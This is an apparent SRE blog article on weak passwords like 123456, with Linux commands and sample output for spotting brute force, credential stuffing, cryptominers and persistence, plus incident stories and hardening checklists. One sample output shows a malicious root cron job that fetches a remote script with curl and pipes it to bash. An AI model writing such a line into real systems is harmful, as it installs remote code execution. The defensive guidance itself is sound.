123456: Humanity’s Favorite Self-Sabotage

Was this helpful?

Production outages don’t always start with a kernel panic, a bad deploy, or a storage controller having a dramatic retirement. Sometimes they start with a six-digit shrug: 123456. A password that says, “I acknowledge the concept of security, and I choose vibes instead.”

If you run systems for a living, you’ve seen it: a sudden wave of failed logins, a compromised admin panel, a “new user created” event no one admits to, and then the real fun—cryptominers, data exfiltration, or a ransom note delivered with the politeness of a crowbar.

Why 123456 keeps winning

People don’t pick 123456 because they’re malicious. They pick it because it’s the path of least resistance in a world designed to demand passwords everywhere, all the time, with inconsistent UX and inconsistent consequences. Then we act surprised when attackers do the obvious thing and try the obvious password.

From an SRE perspective, 123456 is not just a “security problem.” It’s an availability problem. Once an attacker gets a foothold via a weak password, they don’t politely stop at reading data. They burn CPU, saturate disks, hammer databases, spam outbound mail until your IP reputation is a crater, and trigger auto-scaling loops that look like “growth” until Finance calls.

And from a storage engineer perspective, compromised accounts love to turn durable storage into expensive confetti: encrypting files, snapshotting at the wrong cadence, deleting backups with the same credentials, and filling volumes with garbage until everything is read-only and everyone is suddenly very interested in “retention policies.”

Here’s the uncomfortable truth: 123456 isn’t a password. It’s a vote for failure. Your job isn’t to shame people into better voting. Your job is to design systems where that vote can’t pass.

One quote to frame the mindset, because it holds up in every postmortem: “Hope is not a strategy.” — Gene Kranz.

Facts and historical context (short, concrete, useful)

  • Password reuse became normal when the average person started managing dozens of logins; human memory didn’t scale, so attackers scaled instead.
  • Default credentials shipped on devices and appliances for decades because it reduced support calls and sped up installation.
  • Credential stuffing became mainstream once breach dumps were large and searchable; attackers stopped “guessing” and started “replaying.”
  • Online brute force got cheaper as botnets and cloud infrastructure made distributed attempts easy to rotate and hard to block.
  • Lockout policies backfired in many orgs by enabling denial-of-service: attackers lock out executives on purpose during incidents.
  • SMS-based MFA rose because it was easy, then was repeatedly undermined by SIM swapping and weak telco processes.
  • “Password complexity rules” often improved neither security nor usability; users responded with patterns that were predictable at scale.
  • Service accounts historically escaped scrutiny because they don’t complain; they just keep working until they quietly become your worst credential hygiene.
  • Secrets in code weren’t considered “secrets” in many older workflows; config files and repositories were treated as internal and therefore safe.

What 123456 enables: threat model and failure modes

The attacker’s playbook is boring, which is why it works

When an attacker tries 123456, they’re not being clever. They’re being efficient. They’re targeting the long tail of accounts and interfaces that you forgot, inherited, or never knew existed:

  • Admin panels exposed “temporarily” during a migration.
  • SSH on a bastion where someone created a local user “just for a minute.”
  • Database dashboards with local auth still enabled because SSO “was on the roadmap.”
  • Storage appliances with a web UI protected by defaults.
  • CI/CD systems where a service token has admin scopes because “it needed to deploy.”

Why weak credentials are an uptime issue

After compromise, the payloads that hurt production tend to be:

  • Resource theft: cryptomining, proxying, spam. You notice via CPU spikes, load averages, egress cost, and throttled neighbors.
  • Data access: exfiltration or data scraping. You notice via unusual query patterns, long-running exports, and storage read storms.
  • Destruction: encryption, deletion, snapshot removal. You notice via write amplification, full disks, missing backups, and suddenly-loud executives.

Weak passwords are the first domino. The rest of the line is made of your real production dependencies: identity, network, logging, backup, and the parts of your storage layout that you only think about when they’re on fire.

Short joke #1: A password like 123456 is basically a welcome mat, except the mat also hands out admin access.

Fast diagnosis playbook: find the bottleneck in minutes

When the alarm goes off—login failures spike, accounts get locked, CPU pins, disks thrash—your first job is to determine whether you’re dealing with (a) password guessing, (b) credential stuffing with valid logins, or (c) post-compromise activity. Here’s the sequence that saves time.

First: is this authentication pressure or post-auth damage?

  1. Check failed login rates at the edge (reverse proxy, WAF, SSH). If failures are spiking, you’re likely seeing guessing or stuffing.
  2. Check successful login anomalies (new IPs, new geos, odd user agents, logins at weird times). If success is spiking or patterns shift, assume compromise.
  3. Check system saturation signals: CPU, memory, load, disk I/O, and network egress. If resources are pegged, you may already be running attacker workloads.

Second: identify the chokepoint (CPU? disk? network? locks?)

  1. CPU pinned with high system time: crypto workloads, compression, TLS storms, or kernel overhead.
  2. Disk pinned with high await: logging amplification, database write storms, encryption processes, or full filesystems.
  3. Network egress pinned: exfiltration, spam, proxying, or botnet C2.
  4. Auth backend pinned: LDAP/AD/IdP struggling, causing cascading retries and timeouts.

Third: apply containment that doesn’t break the world

  1. Rate-limit and block at the edge (temporary, targeted). Don’t DDoS yourself with blanket rules.
  2. Disable or fence high-risk interfaces (admin portals, legacy auth endpoints).
  3. Force resets / revoke tokens for affected identities, starting with privileged and service accounts.
  4. Preserve evidence: rotate credentials, but keep logs and a snapshot of compromised hosts if you can do it safely.

Practical tasks (commands, outputs, decisions)

These are real things you can run on a Linux fleet, a proxy, or a node in the blast radius. Each task includes a command, example output, what it means, and what decision you make.

1) Spot a brute-force wave against SSH

cr0x@server:~$ sudo journalctl -u ssh --since "30 min ago" | grep -E "Failed password|Invalid user" | tail -n 8
Jan 22 11:41:02 server sshd[23144]: Failed password for invalid user admin from 203.0.113.77 port 52110 ssh2
Jan 22 11:41:05 server sshd[23144]: Failed password for invalid user admin from 203.0.113.77 port 52110 ssh2
Jan 22 11:41:09 server sshd[23149]: Failed password for root from 198.51.100.24 port 44891 ssh2
Jan 22 11:41:13 server sshd[23152]: Invalid user test from 203.0.113.77 port 52112
Jan 22 11:41:16 server sshd[23152]: Failed password for invalid user test from 203.0.113.77 port 52112 ssh2
Jan 22 11:41:20 server sshd[23158]: Failed password for ubuntu from 198.51.100.24 port 44902 ssh2
Jan 22 11:41:24 server sshd[23158]: Failed password for ubuntu from 198.51.100.24 port 44902 ssh2
Jan 22 11:41:29 server sshd[23163]: Failed password for invalid user oracle from 192.0.2.10 port 60123 ssh2

Meaning: Multiple IPs, common usernames, rapid failures. This is automated guessing.

Decision: If you still allow password auth on SSH, stop. Switch to keys, rate-limit, and block abusive sources.

2) Count failures per source IP (fast triage)

cr0x@server:~$ sudo journalctl -u ssh --since "30 min ago" | grep "Failed password" | awk '{print $(NF-3)}' | sort | uniq -c | sort -nr | head
120 203.0.113.77
64 198.51.100.24
18 192.0.2.10

Meaning: Top talkers. The worst IP is doing most of the damage.

Decision: Block the top sources at the firewall while you implement durable controls (keys, MFA, fail2ban, WAF rules).

3) Check whether SSH password authentication is enabled

cr0x@server:~$ sudo sshd -T | egrep 'passwordauthentication|permitrootlogin|pubkeyauthentication'
passwordauthentication yes
permitrootlogin prohibit-password
pubkeyauthentication yes

Meaning: Passwords are allowed. That’s your open invitation to credential guessing.

Decision: Set PasswordAuthentication no, reload SSH, ensure out-of-band access exists, and verify key distribution first.

4) Apply a targeted firewall block (temporary containment)

cr0x@server:~$ sudo iptables -I INPUT -s 203.0.113.77 -p tcp --dport 22 -j DROP
cr0x@server:~$ sudo iptables -L INPUT -n --line-numbers | head -n 10
Chain INPUT (policy ACCEPT)
num  target     prot opt source           destination
1    DROP       tcp  --  203.0.113.77     0.0.0.0/0            tcp dpt:22
2    ACCEPT     all  --  0.0.0.0/0        0.0.0.0/0

Meaning: The host will drop SSH packets from that source.

Decision: Use this for immediate relief. Don’t confuse it with a long-term control; attackers rotate IPs.

5) Confirm whether you’re facing credential stuffing on a web login

cr0x@server:~$ sudo awk '$9 ~ /401|403/ {print $1}' /var/log/nginx/access.log | sort | uniq -c | sort -nr | head
980 203.0.113.88
744 198.51.100.61
233 192.0.2.44

Meaning: High volume of auth failures from a few IPs. This is likely automated.

Decision: Rate-limit login endpoints, enable bot mitigation, and check whether any successes are happening from the same sources.

6) Find suspicious successful logins (same endpoint, different response)

cr0x@server:~$ sudo awk '$7 ~ /\/login/ && $9 ~ /200|302/ {print $1, $4, $7, $9, $12}' /var/log/nginx/access.log | tail -n 5
198.51.100.61 [22/Jan/2026:11:32:09 +0000] /login 302 "Mozilla/5.0"
203.0.113.88 [22/Jan/2026:11:32:14 +0000] /login 302 "python-requests/2.31.0"
192.0.2.44 [22/Jan/2026:11:32:19 +0000] /login 302 "Mozilla/5.0"
198.51.100.61 [22/Jan/2026:11:32:21 +0000] /login 302 "Mozilla/5.0"
203.0.113.88 [22/Jan/2026:11:32:25 +0000] /login 302 "python-requests/2.31.0"

Meaning: There are successes mixed into the failure storm, including a scripted client. That’s a red flag.

Decision: Treat as potential account takeover. Start session invalidation and investigate affected accounts immediately.

7) Check for new local users (post-compromise persistence)

cr0x@server:~$ sudo awk -F: '$3 >= 1000 {print $1 ":" $3 ":" $7}' /etc/passwd
ubuntu:1000:/bin/bash
deploy:1001:/bin/bash
backup:1002:/usr/sbin/nologin

Meaning: Local accounts exist beyond system users. The question is: are they expected?

Decision: If an unexpected interactive user appears, assume compromise. Disable it, rotate keys/tokens, and examine auth logs for creation time.

8) Identify outbound egress spikes (data theft or spam)

cr0x@server:~$ sudo ss -tnp state established '( sport = :443 or sport = :80 )' | head
ESTAB 0 0 10.0.1.12:443 198.51.100.200:51844 users:(("nginx",pid=1203,fd=33))
ESTAB 0 0 10.0.1.12:443 203.0.113.200:49210 users:(("nginx",pid=1203,fd=41))
ESTAB 0 0 10.0.1.12:443 192.0.2.200:37214 users:(("nginx",pid=1203,fd=52))

Meaning: Established connections are normal, but you need volume context.

Decision: If you see thousands of outbound connections from a box that shouldn’t initiate them, start containment and inspect processes.

9) Find top CPU processes (cryptominer tells on itself)

cr0x@server:~$ ps -eo pid,comm,%cpu,%mem --sort=-%cpu | head
 8442 kswapd0  92.1  0.0
 9011 xmrig    88.3  1.2
 1203 nginx    14.2  0.8
  982 mysqld    7.4 12.3

Meaning: A process like xmrig is a classic mining workload; kswapd0 also indicates memory pressure and thrash.

Decision: Quarantine host, kill process, preserve evidence if required, rotate credentials, and scan for persistence (cron, systemd units, bashrc).

10) Detect suspicious cron entries (persistence)

cr0x@server:~$ sudo crontab -l
no crontab for root
cr0x@server:~$ sudo ls -l /etc/cron.d
total 8
-rw-r--r-- 1 root root 201 Jan 21 09:10 logrotate
-rw-r--r-- 1 root root 118 Jan 22 11:29 sys-update
cr0x@server:~$ sudo cat /etc/cron.d/sys-update
*/5 * * * * root curl -fsSL http://192.0.2.55/u.sh | bash

Meaning: A cron job pulling a script over HTTP is almost never “maintenance.” It’s persistence.

Decision: Remove it, block egress to the host, search fleet for the same signature, and treat secrets on this machine as burned.

11) Check Linux password policy (are you allowing garbage?)

cr0x@server:~$ sudo grep -E 'PASS_(MAX|MIN)_DAYS|PASS_MIN_LEN' /etc/login.defs
PASS_MAX_DAYS   99999
PASS_MIN_DAYS   0
PASS_MIN_LEN    6

Meaning: Six characters minimum and effectively never expiring is an invitation for weak passwords and eternal risk.

Decision: Move to stronger requirements and, more importantly, MFA and key-based auth for admins. Expiration alone is not a fix; it can increase reuse.

12) Verify account lockout policy on PAM (avoid self-DoS)

cr0x@server:~$ sudo grep -R "pam_faillock" -n /etc/pam.d/common-auth
12:auth required pam_faillock.so preauth silent deny=5 unlock_time=900
13:auth [default=die] pam_faillock.so authfail deny=5 unlock_time=900

Meaning: Lockout after 5 failures for 15 minutes. This can stop guessing, but it can also be weaponized.

Decision: For high-value accounts, prefer MFA + rate limits + anomaly detection. Keep lockout, but scope it carefully and protect critical users from targeted lockout.

13) Detect weak passwords in AD with a safe approach (no plaintext, no guessing in prod)

cr0x@server:~$ sudo samba-tool domain passwordsettings show
Minimum password length: 12
Password complexity: on
Password history length: 24
Maximum password age (days): 0

Meaning: Policy is decent on paper: 12 chars, complexity on, no forced rotation.

Decision: Policy alone doesn’t stop 123456 if you have legacy exceptions, local apps, or external auth. Use banned password lists and check for weak passwords with approved tooling.

14) Confirm whether your app still supports local admin login

cr0x@server:~$ grep -R "local_auth" -n /etc/myapp/config.yml
41:local_auth: true

Meaning: Local auth is enabled; SSO may exist but isn’t enforced.

Decision: Turn off local auth or restrict it to break-glass accounts stored in a vault with MFA and monitoring.

15) Check for leaked secrets in environment files (service credentials love hiding here)

cr0x@server:~$ sudo grep -R "PASSWORD=" -n /etc/systemd/system | head
/etc/systemd/system/api.service.d/override.conf:3:Environment="DB_PASSWORD=123456"
/etc/systemd/system/worker.service.d/override.conf:4:Environment="REDIS_PASSWORD=redispass"

Meaning: You have plaintext secrets in service configs, including a literal 123456. This is not rare. It is just expensive.

Decision: Move secrets into a proper secret store, rotate them, and restrict read permissions on unit files. Audit for spread.

16) Validate backups are immutable or at least separated (storage engineer’s sanity check)

cr0x@server:~$ zfs list -t snapshot -o name,creation | tail -n 5
tank/backups@2026-01-21_0200  Thu Jan 21 02:00 2026
tank/backups@2026-01-21_0400  Thu Jan 21 04:00 2026
tank/backups@2026-01-21_0600  Thu Jan 21 06:00 2026
tank/backups@2026-01-21_0800  Thu Jan 21 08:00 2026
tank/backups@2026-01-21_1000  Thu Jan 21 10:00 2026

Meaning: Snapshots exist. That’s necessary, not sufficient.

Decision: If the same credentials that can delete production can delete snapshots, you don’t have a recovery plan—you have a hope plan. Separate duties and protect backups.

Short joke #2: If your incident plan relies on “nobody would try 123456,” you’ve built a museum exhibit, not a security program.

Three corporate mini-stories from the trenches

Mini-story 1: The incident caused by a wrong assumption

A mid-size SaaS company had a customer admin portal, sitting behind a CDN and a modern reverse proxy. The engineering team assumed the login endpoint was “safe enough” because the proxy had some generic bot rules, and because the application had a lockout policy: five failed attempts, then a 10-minute cooldown.

Then the support queue lit up. Customers couldn’t log in. The ops dashboard showed a clean bill of health: CPU normal, memory normal, error rates slightly elevated but not dramatic. It looked like a UX problem. It was not a UX problem.

Attackers weren’t trying to break into accounts. They were trying to deny access by deliberately locking out high-value customer admins. It was “credential stuffing” with a twist: even without valid credentials, the lockout itself was the payload. The team’s assumption—“lockout protects us”—turned out to be the threat model the attacker wanted.

Containment was uncomfortable: they disabled lockout temporarily for customer admins, switched to rate limits and IP reputation at the edge, and added an adaptive challenge step for suspicious login attempts. The customer pain dropped immediately.

The long-term fix was cleaner: enforce MFA for admin roles, add anomaly detection for lockout patterns, and change lockout behavior to slow down attackers without blocking legitimate users (progressive delays rather than hard lockouts).

Mini-story 2: The optimization that backfired

A fintech company had strict password hashing settings—strong algorithm, high cost factor. Good. Then they had a performance incident: login latencies jumped during peak hours. The quick fix was framed as “optimization”: lower the hash cost so authentication wouldn’t be CPU-bound.

It worked. Latency improved. Graphs calmed down. Everyone congratulated themselves for being pragmatic under pressure, which is how you know you’re about to learn something.

Within weeks, the organization saw a spike in account takeovers, mostly on accounts with reused passwords. The attackers weren’t cracking hashes offline; they were stuffing credentials online. But the lowered cost reduced the CPU penalty of each login attempt, making the service more responsive to attackers too. Rate limits were mild. WAF rules were generic. The optimization increased the effective throughput of the attacker pipeline.

The remediation was a full-circle SRE lesson: you don’t “optimize” authentication by weakening it. You add capacity, you add smarter throttles, you add MFA, you enforce better session management, and you protect the login endpoint like it’s a production database—because it is.

They re-raised the hashing cost, implemented progressive delays, and moved high-risk auth checks to a dedicated tier with autoscaling and strict observability. They also learned to measure attacker traffic as a first-class workload.

Mini-story 3: The boring but correct practice that saved the day

A healthcare org ran a mix of on-prem and cloud systems, including storage that held regulated data. They were not flashy. They did not buy every new security product. They did two boring things consistently: centralized logging with retention, and regular credential audits for privileged accounts and service accounts.

One morning, alerts fired for unusual outbound egress from an application server. The immediate suspicion was malware. But the on-call had something better than suspicion: a clear login trail. The logs showed a successful admin login to a legacy dashboard from an IP range that never appeared before, followed by API token creation.

The token was created with a service account that had been exempted from MFA “temporarily” months earlier. That exemption had a ticket, and the ticket had an owner. That owner was reachable. The timeline was short because the evidence was already there, not spread across ten places.

They revoked tokens, rotated the service account credentials, and blocked egress. Most importantly, they restored confidence quickly: backups were on a separate system with separate credentials, and snapshots were retained with controlled deletion rights.

The incident became a minor event rather than a major breach. Not because they were lucky, but because they treated identity as production infrastructure and did the boring maintenance before the exciting failure.

Common mistakes: symptom → root cause → fix

1) Symptom: “We’re seeing thousands of failed logins, but no compromises”

Root cause: You’re assuming compromise only means “data accessed.” Attackers also do account lockout DoS, enumeration, and recon.

Fix: Track failed logins as an availability SLO concern. Add rate limits, progressive delays, and bot detection. Protect the login endpoint like a production API.

2) Symptom: “We enabled MFA, but attackers still got in”

Root cause: MFA wasn’t enforced for all privileged paths (legacy local admin, API tokens, service accounts, break-glass accounts). Or you used weak factors without compensating controls.

Fix: Inventory every auth path: UI, API, SSH, database consoles, admin dashboards. Enforce MFA and conditional access consistently. Remove legacy paths or gate them behind stronger controls.

3) Symptom: “Users keep choosing weak passwords despite policy”

Root cause: Complexity rules trained users to create predictable patterns; you didn’t implement banned password lists or password managers.

Fix: Use a banned-password list and require longer passphrases. Provide a password manager and make it the default, not a suggestion.

4) Symptom: “A single compromised account took down backups too”

Root cause: Backup deletion rights shared with production admin rights; no immutability or separation of duties.

Fix: Split credentials and roles. Use immutable backups or at least write-once retention and dedicated backup identities. Monitor snapshot deletion events aggressively.

5) Symptom: “We blocked IPs, but the attack continues”

Root cause: You’re fighting a distributed system with a static list. Attackers rotate IPs via botnets and cloud ranges.

Fix: Use rate limiting, behavioral detection, and identity-based controls (MFA, token binding, device posture), not just IP blocks.

6) Symptom: “We can’t disable password auth on SSH because automation will break”

Root cause: Automation is using shared passwords or ad-hoc local users, not keys, not short-lived credentials.

Fix: Move automation to SSH keys (or better: short-lived certs). Rotate and scope credentials. Treat automation identities as high-privilege service accounts.

7) Symptom: “Login latency spikes during attack traffic”

Root cause: Authentication is CPU-bound (hashing cost, TLS termination), or auth backend is saturated (LDAP/IdP timeouts). Retries amplify load.

Fix: Isolate auth tier, autoscale, cache responsibly, add circuit breakers, and throttle login attempts early (edge) before backend work.

8) Symptom: “We rotated passwords, but suspicious activity continues”

Root cause: Tokens/sessions weren’t revoked; attacker has persistence (cron/systemd), or other credentials were also compromised.

Fix: Invalidate sessions, revoke tokens, rotate all secrets in the blast radius, hunt persistence, and verify via logs that old tokens no longer work.

Checklists / step-by-step plan

Step-by-step: eliminate 123456-class failures without boiling the ocean

  1. Inventory auth surfaces. List every login path: web apps, admin portals, SSH, VPN, databases, storage UIs, CI/CD, monitoring tools.
  2. Kill default credentials. For anything shipped with defaults, change them during provisioning. No exceptions.
  3. Enforce MFA for privileged roles first. Admins, operators, CI/CD maintainers, storage admins, and any account that can delete backups.
  4. Disable password auth where possible. SSH should be key-based; internal admin panels should be behind SSO with conditional access.
  5. Implement a banned-password policy. Explicitly reject known weak strings and common sequences, including 123456 and friends.
  6. Fix service accounts. No shared passwords. Prefer short-lived tokens. Scope permissions. Rotate on a schedule you actually follow.
  7. Add rate limiting and progressive delays. At the edge, before expensive backend operations. Treat auth as a hot path.
  8. Centralize logs and keep them. Authentication logs, admin actions, token creation, snapshot deletions, and privilege changes.
  9. Separate backup authority. Backups must survive the compromise of production admin credentials.
  10. Run tabletop exercises. Practice “credential stuffing + partial compromise” and measure time-to-containment and time-to-restore.

Operational checklist for an active attack

  • Confirm whether successes are occurring among failures (stuffing vs guessing).
  • Block/rate-limit at the edge; don’t hammer your IdP/LDAP with retries.
  • Identify targeted accounts (privileged first). Force resets and revoke sessions/tokens.
  • Inspect for persistence on hosts that show anomalous behavior.
  • Preserve logs and relevant host artifacts; don’t wipe first and ask questions later.
  • Verify backup integrity and isolation before you need it.

FAQ

Why is 123456 still so common?

Because friction is real and consequences are delayed. People optimize for “works now,” especially under time pressure. Systems need to make the secure path the easiest path.

Is banning 123456 enough?

No. Banning known weak passwords is table stakes. The real win comes from MFA, eliminating password auth where possible, and limiting blast radius via least privilege and token scoping.

Does password complexity help?

Sometimes, but it often trains predictable patterns. Prefer longer passphrases, banned-password lists, and password managers. Complexity without usability becomes reuse.

Should we force password rotation every 90 days?

Not by default. Forced rotation can increase predictable changes and reuse unless you have evidence of compromise. Rotate when risk changes (breach, role change, suspicious activity) and for service accounts on a managed schedule.

What’s the difference between brute force and credential stuffing?

Brute force guesses passwords blindly. Credential stuffing reuses known username/password pairs from previous breaches. Stuffing succeeds more often, so you must monitor successful logins for anomalies, not just failures.

What should we do about service accounts that “can’t use MFA”?

That phrase usually means “we built it wrong.” Use short-lived tokens, workload identity, SSH certificates, or tightly scoped API keys stored in a secret manager. If you must use a static secret, rotate it and constrain its permissions brutally.

How do we avoid locking out legitimate users during an attack?

Use progressive delays, device/IP reputation, and challenges rather than hard lockouts. Hard lockouts are easy for attackers to weaponize, especially against VIP accounts.

What logs matter most when investigating account takeover?

Auth events (success/failure), token/session creation and revocation, privilege/role changes, password resets, and sensitive admin actions (export, delete, snapshot destroy). Keep timestamps consistent and searchable.

How does this relate to storage and backups specifically?

Compromised credentials are frequently used to delete snapshots, encrypt file shares, and destroy restore points. Storage resilience is an identity problem: separate credentials, immutable retention, and monitored deletion rights.

Is MFA enough to stop everything?

No. It dramatically reduces risk, but attackers pivot: session hijacking, token theft, social engineering, and exploiting legacy auth paths. MFA is a foundation, not a finish line.

Next steps that actually reduce risk

Start with the places where 123456 hurts the most: privileged accounts, exposed admin interfaces, SSH, and anything that can delete backups. Do the unglamorous work: inventory auth surfaces, enforce MFA consistently, disable password auth where you can, and add rate limiting that protects your backend from doing expensive work on attacker demand.

Then make recovery real. Separate backup authority, test restores, and monitor the events that matter: token creation, role changes, snapshot deletions, and successful logins from new contexts. If you can’t answer “who logged in, from where, and what did they do” within minutes, your logging isn’t observability—it’s decoration.

The goal isn’t to teach humans to stop being human. The goal is to run systems that don’t let six digits turn into six-figure damage.

← Previous
Debian 13 Firmware Missing After Install: Fix NIC and HBA Support the Right Way
Next →
DNS: NXDOMAIN vs SERVFAIL — the quick way to tell what’s broken (and fix it)

Leave a comment